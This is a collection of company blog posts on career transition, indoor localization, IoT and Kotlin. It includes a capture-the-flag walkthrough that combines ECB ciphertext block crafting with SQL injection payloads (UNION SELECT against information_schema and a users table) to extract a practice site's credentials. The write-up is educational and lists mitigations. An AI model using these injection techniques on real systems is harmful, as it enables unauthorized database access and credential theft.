Scinonova logo

Scionova

Taking the step from studies to work life

by

This blog post will be divided into two separate entities. First I will tell you about my journey from studies to work life and bring up some thoughts on that process. This part only considers my personal experience and might contradict other views, but in my experience, it is not too far from what I have heard from associates about their own journey. Secondly, I will have a look back at my years at Chalmers University and compare studies and work life to figure out the important question – which one rocks the most?

 

Part 1: The journey from studies to work life

 

Background

When I was younger I rarely thought about my future. Questions like “What do you wanna become when you grow up?” of course ran through my head once or twice but mostly I just did what I thought was interesting at the moment. It has always been quite easy for me to learn new stuff and adapt to situations rather quickly which meant that my attitude to prepare for the future was quite close to “Pffft, I guess I’ll solve it along the way”.

Getting closer to the end of the studies

However, during the last years at the university, this mentality changed. Suddenly it felt important to do everything right – select the correct master’s programme, select all my courses with care and generally make sure all choices aligned in a clear direction for the life that was to come after my studies were done. As a consequence of this, I also started worrying about the future and if I had made decent choices in the past – something I had never even considered before.

My studies in the master’s programme went well but soon it was time for the biggest mental hurdle of them all – the master thesis. It represented half a year of work where I would have to use all of the skills I had learned during the past 4.5 years and package this into a compact project which had to have strong academic value, a report longer than any I had written before and conclusion that would help save the world. Or at least, this was my initial thoughts on the master thesis.

Master Thesis – do or die?

When it was time to find a subject for my master thesis, most of the companies I talked to were very positive on taking me in but none really presented an actual proposal on what I could do. Even though I might be creative in coding, I am not very good at trying to make up new projects from nothing which meant I needed some help to get started. Late in November, after meeting some Scionova employees at the Date-IT fair and later attending their meetup, I heard an amazing idea about bringing more cybersecurity into the field of smart homes. Soon the hype train was going and I found myself together with Lisa, whom I had done multiple projects with during other courses, towards a master thesis at Scionova. I remember going home that evening thinking, “Wait, that wasn’t so hard and scary?”.

After having some struggles with Chalmers administration details, particularly in getting a master thesis supervisor for our project, we finally could start the project in May 2019. It still felt a bit scary to maintain all parts of such a big project all by ourselves but it worked out nicely in the end. We got employed by Scionova somewhere in October and everything started to feel a little less stressed again. Suddenly I was not that stressed about leaving studies and entering the working world.

Getting rid of all the nervousness

In December I went to a consultant interview and it actually felt really good. I got to meet some people from the team and they seemed like normal human beings, the project did not sound like rocket science and somehow I started to realize that it would all turn out okay. One month later I started the assignment and now four months later it is hard to understand how I could feel so nervous about growing up and starting to work. It is actually even more interesting now since I can dive into challenging coding problems all day long and actually get paid for it. Work-life DO actually have some benefits!

 

Part 2: Studies or work life – which one rocks the most?

 

Time

This is probably the most classic thing to mention when comparing studies and work life but an interesting opinion of mine is that neither side has the upper hand. On one side, work life means free weekends and no responsibilities outside working hours. On the other hand, while studies might keep you busy on both evenings and weekends you do not have the same requirement concerning the amount of working hours. As long as you have learned what you are supposed to, you could actually take the rest day off to work on your hobby coding project, or go out to see the sun, or go out for a run, or…. Yeah, you get it. I miss the freedom in time management that studies bring but I definitely do not miss the stress.

Monetary assets

Another one of those classic aspects to mention is money. I am one of those people who do not spend particularly much money overall, which actually made it rather easy for me to survive on study grants and the cheap study loans CSN provides. However, one must remember that this is something rather unique to Sweden – instead of paying for education we actually get money to study. However, with all that said, getting a salary and feel that I can do anything is rather nice. Wanna buy that new cool tech stuff to integrate into your smart home? Wanna have both Netflix and HBO at the same time? Now it is actually possible!

Vacation

Chalmers last study period during spring ends around the beginning of June and the first study period of the autumn starts at the beginning of September, giving roughly 13 weeks of study break. Most students have summer jobs but those are usually rather flexible and is often an interesting contrast to study life. Personally, I usually worked around 6 weeks every summer, late June to early August, leaving 7 weeks of freedom. Working life is not quite as generous with 4 weeks leave in the summer to keep some days for the rest of the year as well. Amazingly long relaxing summers are definitely something I am going to miss.

Club activities (föreningsliv)

Student life outside studies is filled with activities, associations and other fun stuff that makes life really amazing. Unfortunately, this is not really the case for work life. It seems like people are trying to organize fun activities within companies, but it is much harder to get it going. When you think of it, this actually makes a lot of sense. Instead of having people in the same life situation with flexible schedules and apartments nearby attending your activity you will have to coordinate a mix of people in all ages, with or without children, with other hobbies outside work, etc. However, I love that AWs, celebrations and other nice activities still happen even though these barriers exist.. +1 to student life for all the activities but +1 to work life for effort!

 

 

Context-switching

Studies are all about learning new things and hence you never stick with the same courses and projects for a long time – do what you are supposed to do in the course, learn from it, move on and start with another entirely different task in the next course. As a contrast, work life is all about one big project that you are supposed to take from one less evolved state to another more evolved state during a longer period. You get to explore problems in its depth, feel the face slaps from your own errors coming back at you and enjoy the progress of yourself and your team when the code actually starts working!

Smart experienced people

I have had the luck to end up in a team with incredibly talented senior developers who have taught me so much even in this short time. This is something that sometimes is lacking in studies – most students are on the same skill level and you rarely get a close enough relationship to teaching assistants and professors to be able to absorb such knowledge effectively.Working in IT definitely means learning a lot of stuff!

Conclusion

So that was a list of differences and similarities between work life and student life. In the end though, who wins? For me personally, it is actually fifty-fifty with pros and cons on every front. Sooner or later you will have to transition from one to another and the most important thing to remember is that it does not get worse. Maybe different. But not worse.

 

Regards Matz

2019 – The year of indoor localization

by

There has always been a need for accurate indoor position systems, but the lack of affordable, standardized and interoperable solutions has been a major problem holding the market back.

Finally, it looks like this will change. During 2019, not one, but two important new specifications will be released that can totally change this market.

Bluetooth 5.1

January 21st the Bluetooth SIG released the 5.1 specification. The most important new features are the direction finding methods Angle Of Arrival (AOA) and Angle Of Departure(AOD). This enables devices to be positioned by calculating the angle to units with known positions. This method is based on that either the receiving (AOA) or sending (AOD) device is equipped with a multi-antenna system. The device switch between the antennas and measure the phase difference.

IEEE 802.15.4z standard for UWB

Like Bluetooth, also the latest standard for UWB includes new features to improve its performance for localization. The UWB solution uses a different approach for positioning, it measures the time it takes for the radio signal to travel from one device to the other. With this time measured and the known speed of light, the distance between the devices is calculated.

So, which one is the most interesting one?

Bluetooth has a long and successful history of providing solutions that get wide adoption in consumer electronics. They understand the need of hard work with interoperability to be successful. UWB, on the other hand, has advantages due to its wide spectrum use that makes it less sensitive to interference.

When it comes to the use case to localize our most common consumer device, the phone, both technologies look very interesting. We see it as very likely that phones and beacons will adopt Bluetooth 5.1 since it solves a problem where Bluetooth has lacked performance.

Looking at the IEEE website it is also interesting to see that major phone manufacturers are the ones driving the new UWB standard. Apple and Samsung are the two most active companies in the work of getting the standards ready for adoption. This indicates that we likely will see UWB in phones at least 2020 and several sites reports that this will be the case.

What about accuracy?

Both claim to provide be able to provide indoor positioning with about 10cm accuracy with 4 fixed devices with known positions within range (around 30m). Naturally, this will depend on both the implementation and the environment.

Sounds Interesting?

We have a long and deep knowledge about Bluetooth and have already started working with UWB for indoor localization and we are ready to take on new challenging projects within this area. We would love to help you to be early on the market with these new interesting technologies.

 

Best Regards

// Peter Fredriksson
Senior consultant

 

Wargames – A web Application Hack

by

$> WARGAMES

Even though my daily work usually has little to do with security, I consider it a virtue to keep up to date with security basics and to try to maintain a certain breadth in my technical knowledge.

But perhaps more importantly, I find it to be a lot of fun to engage in what’s known as “wargames” – simulated hacking challenges which test one’s skills and reasoning.

If you’re a programmer with a knack for security you might have heard of the term “CTF” or “Capture The Flag” – events where individuals or teams compete to be the first to solve a set of challenges. Wargames are essentially the same, but without the time limit typically associated with CTFs and many of them are focused on learning basic techniques rather than having to figure out novel approaches to convoluted problems.


$> THE FLAVOUR OF THE DAY: WEB

As one might expect, there are many kinds of wargames. Common broad themes include web applications, cryptography and binary exploitation (abusing buffer overflows and alike). Harder wargames can require knowledge of many different topics and obscure language and/or configuration features.

I’m terrible with the web software stack and have therefore been afraid of trying web-themed wargames for a long time. I finally decided to change that by learning a bit and seeing how far I get. This post describes my way through one particularly interesting challenge I recently encountered after succeeding with some easier ones.

WARNING: Contains spoilers for a single level in a specific web wargame. It’s not the only writeup of this level, but you might still want to avoid reading if that sounds like something you’ll want to be doing by yourself.


$> GOAL

The goal of this challenge is simple: get the password to the next level. We know that the password can be found in the file /etc/passwords/password29 on the server if we can access it somehow, or it might be stored in some additional place we can get our hands on.

Let’s get right on it!


$> POKING AROUND

We land on a webpage that seems to host some sort of joke database. There appears to be a search feature which accepts input from us, and a notice proclaiming that this time we won’t be seeing the source code for the application we’re exploiting. Awww.

Let’s see what happens when we input some things manually…

hilarious_joke

It’s hilarious!

 

The normal use seems simple enough: there exists a database of jokes, and we can search for text contained in them. Up to three are randomly picked if our query matches several entries.
After some trial and error, it seems like the application gracefully handles the good old SQL injection workhorses – quotes, dashes, pound signs and what have you.

But the URL looks interesting. And if something stands out in a wargame, it probably is.

If we manually mess with this URL, we get an interesting error.

padding_error

A cursory DDG search reveals that this problem is usually related to AES encryption. That’s a good pointer.


$> SITEMAP

Based on what happens with our input and what we can see from the source code of the webpages, this is the sitemap we get:

http://site.name/ (same as index.php)
http://site.name/index.php
http://site.name/search.php

The input box on index.php results in a HTTP POST request to search.php which eventually gets redirected to a HTTP GET with a transformed query parameter.

Otherwise there’s little of interest that we can glean from the source code of the pages.

(Also, calling search.php without parameters yields a cryptic result: just the string “mep”. This led me on a wild goose chase for a *.pem file (crypto certificate) that I half expected to be able to find. I can’t know for sure there isn’t one, but my time was certainly wasted. This can be interpreted as the site admins being cruel, or me being stupid – the latter of which is a terrible thought to entertain.)


$> STUDYING THE RESULTING URLS

Inputting the string ‘aaaaaaaaaaaa’ as query yields the following URL:
http://site.name/search.php?query=G%2BglEae6W%2F1XjA7vRm21nNyEco%2Fc%2BJ2TdR0Qp8dcjPLAhy3ui8kLEVaROwiiI6OezoKpVTtluBKA%2B2078pAPR3X9UET9Bj0m9rt%2Fc0tByJk%3D

Let’s pick out the query part:
G%2BglEae6W%2F1XjA7vRm21nNyEco%2Fc%2BJ2TdR0Qp8dcjPLAhy3ui8kLEVaROwiiI6OezoKpVTtluBKA%2B2078pAPR3X9UET9Bj0m9rt%2Fc0tByJk%3D

And urldecode it:
G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPLAhy3ui8kLEVaROwiiI6OezoKpVTtluBKA+2078pAPR3X9UET9Bj0m9rt/c0tByJk=

Alphanumeric, with the addition of plus signs and slashes and equal signs at the end? Looks like base64.
Just decoding it to stdout messes up my terminal, so we’re looking at binary data. Let’s get a hexdump instead:

00000000: 1be8 2511 a7ba 5bfd 578c 0eef 466d b59c ..%...[.W...Fm..
00000010: dc84 728f dcf8 9d93 751d 10a7 c75c 8cf2 ..r.....u....\..
00000020: c087 2dee 8bc9 0b11 5691 3b08 a223 a39e ..-.....V.;..#..
00000030: ce82 a955 3b65 b812 80fb 6d3b f290 0f47 ...U;e....m;...G
00000040: 75fd 5044 fd06 3d26 f6bb 7f73 4b41 c899 u.PD..=&...sKA..

Yikes, I can’t make heads or tails out of it!

Trying out more human-pseudo-random values with a quick and dirty bash/curl script gives the following bits of knowledge:

  • The initial 32 bytes are always the same.
  • The output is deterministic (the same input always results in the same output).
  • Curiously, a string consisting of just a bunch of percent signs results in jokes being displayed despite not containing percent signs.


$> CIPHER MODE DISCOVERY

Eventually, I ended up trying a really long repetition of a single character as input.
The result was the following:

00000000: 1be8 2511 a7ba 5bfd 578c 0eef 466d b59c ..%...[.W...Fm..
00000010: dc84 728f dcf8 9d93 751d 10a7 c75c 8cf2 ..r.....u....\..
00000020: c087 2dee 8bc9 0b11 5691 3b08 a223 a39e ..-.....V.;..#..
00000030: b390 38c2 8df7 9b65 d261 51df 58f7 eaa3 ..8....e.aQ.X...
00000040: b390 38c2 8df7 9b65 d261 51df 58f7 eaa3 ..8....e.aQ.X...
00000050: b390 38c2 8df7 9b65 d261 51df 58f7 eaa3 ..8....e.aQ.X...
00000060: b4ed a087 d3c0 bea2 bedc 1b61 40b9 e2eb ...........a@...
00000070: ca8c f4e6 1091 3aba e39a 0676 1920 4a5a ......:....v. JZ

This is really good information – it reveals that blocks are independently encrypted (Electronic CodeBook mode rather than Cipher Block Chaining), and are 16 bytes (128 bits) long.


$> CRACKING THE KEY

Yet another search engine query, this time on the subject of cracking 128 bit ECB AES, reveals that without more information about the key it would take approximately “Forever” to do that. It’s unlikely that we have that much time at our disposal so let’s look elsewhere.


$> CIPHERTEXT LAYOUT

We can now, however, figure out the layout of the ciphertext. (This is also where I moved from my shoddy shell script to the modern world with python3 and requests to better be able to automate it.)

I inserted ‘a’ characters one at a time until obtaining the first instance of the now familiar ciphertext of a block of 16 ‘a’ characters. This happened after 26 characters. We know from earlier that that two first 16 byte blocks are always the same, so there are six unknown bytes in the third.

Moving on from there, I inserted more ‘a’ characters until the ciphertext length increased by one block. This happened after three more characters. As per the specification of PKCS#7, if the length of the source mod the block size is zero, a full block of padding needs to be added. That means that three bytes in the last block earlier were just padding.

(Also that netted us the ciphertext of a valid padding-only block that we can use later.)

Putting all of this together, the result is as follows:

Legend:
P = unknown prefix
a = our query string
S = unknown suffix

PPPPPPPPPPPPPPPP
PPPPPPPPPPPPPPPP
PPPPPPaaaaaaaaaa
aaaaaaaaaaaaaaaa
SSSSSSSSSSSSSSSS
SSSSSSSSSSSSS

While we can’t really know what the unknown parts are, it’d be reasonable to guess that in one way or another they’re related to querying a database, be it SQL or some clever php grepping in a directory with plain text files.


$> DECIPHERING THE TAIL (FAIL)

With this recent knowledge in hand, it seems straightforward enough to figure out the suffix:

By reducing the length of our input by one, we should get the ciphertext for the following:

PPPPPPPPPPPPPPPP
PPPPPPPPPPPPPPPP
PPPPPPaaaaaaaaaa
aaaaaaaaaaaaaaaS -- b'abc123...'
SSSSSSSSSSSSSSSS
SSSSSSSSSSSS

Then, if we extend our input by one byte, iteratively trying out values for all possible bytes until we get the same ciphertext, we should be able to decipher the data one byte at a time.

Unfortunately, for mysterious reasons, this seemed to only work for a single byte (‘%’ – a percent sign) and then nothing would yield a matching ciphertext. I dabbled a while trying to figure out whether I had messed up something with my URL-encoding or so… but to no avail.

At this point I was at my wit’s (and weekend’s) end and let the problem rest for a few days.


$> A GIFT FROM THE GODS

While doing completely unrelated things at work, I stumbled across a SQL query like this:
"SELECT thing FROM things WHERE content LIKE 'prefix_%'"

And I remembered the recent percent sign oddity, and the one from the start of the challenge and suddenly everything fell into place. And by everything I mean both the realization of me clearly needing to study more SQL and what seems to be happening behind the scenes in the challenge.

(For reference: ‘%’ acts as a wildcard for ‘zero or more characters’ in SQL like. Underscores match a single character, and I could quickly verify that our query treated these characters exactly so.)

We can now have a proper qualified guess at what’s hidden in the ciphertext:

SELECT * FROM JO
KES WHERE JOKE L
IKE '%aaaaaaaaaa
aaaaaaaaaaaaaa%'
COLLATE latin1_
general_cs_as

(Database people might observe that parts of this guess are very likely way off, but it’s good enough to get us moving forward.)

Come weekend, I leaped back into the fray.


$> CRAFTING

We now have a way forward – conceptually as easy as your run of the mill SQL injection, we just have to mold our payload into a format that the application accepts.

So let’s make some blocks. We’ll craft something like this:

Legend:
P = unknown prefix
a = our padding and canaries
Q = the input we want ciphertext for
S = unknown suffix

PPPPPPPPPPPPPPPP
PPPPPPPPPPPPPPPP
PPPPPPaaaaaaaaaa
aaaaaaaaaaaaaaaa
QQQQQQQQQQQQQQQQ
aaaaaaaaaaaaaaaa
SSSSSSSSSSSSSSSS
SSSSSSSSSSSSS

So for example, if we want the ciphertext for “16 BYTES OF JUNK”, we send in a query string like:

“aaaaaaaaaaaaaaaaaaaaaaaaaa16 BYTES OF JUNKaaaaaaaaaaaaaaaa”

And we should get a result with ciphertext blocks like:

...
b'b39038c28df79b65d26151df58f7eaa3' (canary)
b'deadbeefdeadbeefdeadbeefdeadbeef' (what we want)
b'b39038c28df79b65d26151df58f7eaa3' (canary)
...

And we can keep saving values for interesting 16 byte blocks to be used in our payload.

It turns out, however, that some inputs corrupt the canary value after our expected 16 byte ciphertext block – most noticeably quotes and backslashes. As is customary, it’s time to guess why. I’d fathom a likely candidate is that before our query is encrypted, mysqli_real_escape_string is called on the input.

That means we can’t easily place quotes in the middle of a block. But we can feed this to the application:

aaaaaaaaaaaaaaa'
DataDataDataDat

To produce a ciphertext equivalent of:

aaaaaaaaaaaaaaa\
'DataDataDataDat

Like so:

crafting_ciphertext

That’ll be enough for our purposes.


$> THE ATTACK

We now know how to craft our own ciphertexts and have a good idea of what the backend is doing.
We also observe that we can ignore the suffix of the query and replace it with the full padding block ciphertext we acquired earlier to shorten our query a bit and not have the suffix interfere with our experiments.

At this point I attempted many times to craft something useful and failed for various more or less stupid reasons. But since I’m writing this from a retrospective angle, I can pretend that I immediately arrived at this point:

SELECT * FROM JO -- b'1be8251117ba5bfd578c0eef466db59c'
KES WHERE JOKE L -- b'dc84728fd2f89d93751d10a7c75c8cf2'
IKE '%aaaaaaaaaa -- b'c0872dee8b390b1156913b08a223a39e'
' UNION SELECT   -- b'36c550994e94298f5a065ac38ea9cbd7'
1;#              -- b'9fb2c82683985bd21224f4a1dd70507e'
<16 byte pad>    -- b'75fd5044fd063626f6bb7f734b41c899'

If we concatenate those values, base64-encode the block, URL-encode the result, and send it to search.php, we get the following:

sql_fun

Looks very promising!

Let’s proceed:

SELECT * FROM JO -- b'1be8251117ba5bfd578c0eef466db59c'
KES WHERE JOKE L -- b'dc84728fd2f89d93751d10a7c75c8cf2'
IKE '%aaaaaaaaaa -- b'c0872dee8b390b1156913b08a223a39e'
' UNION SELECT   -- b'36c550994e94298f5a065ac38ea9cbd7'
table_name FROM  -- b'49628aa9ea9f5f088b720ba991d91dc5'
information_sche -- b'0329a1abfe5c16ae68ce04abf9a935c8'
ma.tables;#      -- b'3f74e043974e647b303b0c3e1cec6604'
<16 byte pad>    -- b'75fd5044fd063626f6bb7f734b41c899'

Bingo!
We get the entire list of table names. Two stand out: ‘jokes’ and ‘users’.

Let’s skip the jokes prefix too (and fixing the error I got when my query result no longer contained a joke column):

SELECT column_na -- b'0bb623e8185083eb808d997e9dc9edc4'
me as joke from  -- b'8e934d7e5200d5d5cda7344f3f9b7f3c'
informat         -- b'eb8b19c46430e317918ce1727a6350e1'
ion_schema.colum -- b'ab1cb043f4546efcc1d8f97b217bcf2d'
ns where table_n -- b'44bd82dfac975e1d5f5c1aa784985be2'
ame LIKE         -- b'7427adc2fafca6f328e5845b4c75d912'
'users%%%%%%%%%% -- b'cc221115d011307f2515496e360fa96b'
';#              -- b'0018ad0c0200bda82423885bea3701fa'
<16 byte pad>    -- b'75fd5044fd063626f6bb7f734b41c899'

We get:
username
password

Finally:

select username  -- b'2e935761dedf092525f2259d8444df3e'
as joke from use -- b'13b7a41e291aafeff2ebb88c17fd1c5a'
rs union select  -- b'ebd89e1563dc499ce3140dc21567240d'
password from us -- b'8c11f169f048c2b9ef2739011035e2b0'
ers;#            -- b'4cf81cbe37c5a5fac50c72e64c37fd8b'
<16 byte pad>    -- b'75fd5044fd063626f6bb7f734b41c899'

sql_injection_win

And we have completed the objective of the challenge: the username is “root@kali” and the secret password is “that is not how you specify the port”.


$> CONCLUSIONS

If you’ve read this far you’ve probably concluded that the challenge was not very realistic and the vulnerability could’ve been mitigated or prevented in multiple ways:

  • Using different databases for login data and other, non-critical data
  • Crafting the final SQL query closer to the database, making it difficult to bypass mysqli_real_escape_string
  • Avoiding printing detailed error messages to the end user
  • Using a modern mode of encryption (CBC) instead of deprecated ECB
  • Not giving the end user direct access to the ciphertext

(Arguably there is little need for the extra encryption and data forwarding layer here at all, but let us assume that it is an unavoidable Business Requirement from upper management).

But all of that is beside the point! We explored, tried things, learned things and persisted until we found something that worked. Realistic scenario or not, that’s the workflow which yields results. And we had a lot of fun along the way, didn’t we?

If you think you might be interested in trying out some wargaming, here’s a good collection of sites that might be interesting:
https://www.wechall.net/active_sites
Everyone has their own preferences, so pick your poison and dive right in. If you don’t like a certain site, try another. If you’re very new, expect to be struggling a lot at the start – but there’s no need to rush, and indeed, you shouldn’t.

That’s all from me – hope you enjoyed the read and/or learned something!

Hugs,
Chrys

Three short tips for successful IoT projects

by

IoT is currently leaving the state of proof of concepts and is happening in big scale. After helping our customers execute IoT projects for over a decade, here are three short tips if you are about to start your connectivity journey.

1. Business case
There may be many reasons why you are investigating the possibility to make your products connected but without a solid business case, it will be hard to execute the project. What are the main use cases that the customers are willing to pay for? What are the services that can reduce cost and maintenance for you? Always start here, with a solid idea about use cases and business cases and the rest will follow. Simple as it sounds, this is where many IoT projects fail.


2. Strategy
When you have an idea about what to do, it is time to investigate how. It is easy to jumpstart the project to solve the main use cases. But taking a step back and looking at the bigger picture now can be a good investment. Are there more products down the line that would benefit from connectivity? Can you build a reusable platform that reduces cost and risk in the coming projects? What part do you want to develop on your own and what can be bought off the shelf? Making good design choices now gives you a successful long-term strategy where all your products can benefit from connectivity.


3. Integration
Making a product connected does not automatically make it smart. The real benefit often comes when integrating and sharing information with other systems. The first idea is often to build something new end-to-end. But is this really what you and your customers want? Instead of creating everything on your own, check if your product can be integrated with existing systems. This might lead to better user experience and lower costs.

If you have any questions about your upcoming IoT projects, don´t hesitate to contact me and my team at Scionova.

// Peter Fredriksson, co founder of Scionova

Introduction to Kotlin

by

In this blog post I will give you a small introduction to the programming language Kotlin (which last year was added as a supported language for Android) and describe a few of my favorite features of the language.

Background

Last year at Google I/O, it was announced that Kotlin would be added as supported language in Android. A lot of tutorials, introductions and examples has emerged from the community since, and it is clear from the Android Developer page for Kotlin that Google themselves want developers to see the advantages of Kotlin with a lot of helpful documentation and examples.

Android is growing rapidly in the automotive industry, among others Volvo and Audi has decided to use the Android operating system in their infotainment systems. This gives for a perfect reason to get some more knowledge about this rising star of programming languages!

In Android, Kotlin is compiled to JVM byte code so it is possible to call Java code from Kotlin and vice versa, which makes it easy to have a gradual transition from Java to Kotlin in an application. Kotlin is supported from Android Studio 3.0, which even introduced a feature to convert a file containing Java code to Kotlin. In my experience this function doesn’t work optimally but it gives you a head start on your way to update your application to Kotlin.

Nullability

In Kotlin, the “billion dollar mistake” has been solved by forcing the programmer to express nullability explicitly in the type of a variable. By appending a question mark to the type, we let the compiler (and other programmers) know that the variable is nullable.

When we try to assign null to a variable of non-nullable type:

After appending the question mark, it is possible for the variable to hold null:

Safe call operator
In order to call a member function on a variable of nullable type, the safe call operator (?.) is one of the possible ways. If we try to call a member function the usual way, we get an error:

Though if we use the safe call operator, we get a different result:

As you can see, the safe call operator returns null if the variable it is applied to holds a null reference. The returned value will also be a nullable, in this case an Int?.

Elvis operator
Another handy feature of Kotlin is the so-called Elvis operator (?:). It returns the value to the left of the operator if it is not null, and the value to the right if it is.

Continued reading about Kotlin null safety
For more information regarding null safety in Kotlin, check out the official documentation on the subject.

Mutability of variables

As you might have noticed in the examples above, a variable can be declared with the keyword var.

This creates a variable that is mutable, e.g. it is possible to alter its value at a later point. It is also possible to make a variable immutable, this is done using the keyword val when declaring the variable instead:

Extension functions

In Kotlin, it is possible to extend classes with your own functions without creating subclasses. This concept is called extension functions and they are declared like this:

In this example the standard class Int is extended with a function square that can be called on integers in all files the declaration of the extension is included in. See the official documentation for more examples.

Data classes

What in Java is called a POJO, has its Kotlin counterpart in data classes. A data class contains a lot of extra functionality which would be boilerplate in a POJO, e.g. equals, hashCode and toString. This allows you to create a class with just a one-liner:

It is possible to declare a variable with either var or val in a class, with the difference that a var makes the compiler to generate a setter function for the variable in the class beside the getter that is generated for public variables.

Finishing words

The null safety of Kotlin is a big selling point of Kotlin and something that often is pointed out as an advantage of using Kotlin over Java when developing for Android (beside for verbosity). In this post I have scarcely scratched the surface of Kotlin and if you are interested in learning more I would recommend you to continue your reading on the official webpage of the language, but also on the Android Developer page for Kotlin.

 

// Johannes Jansson, Software Developer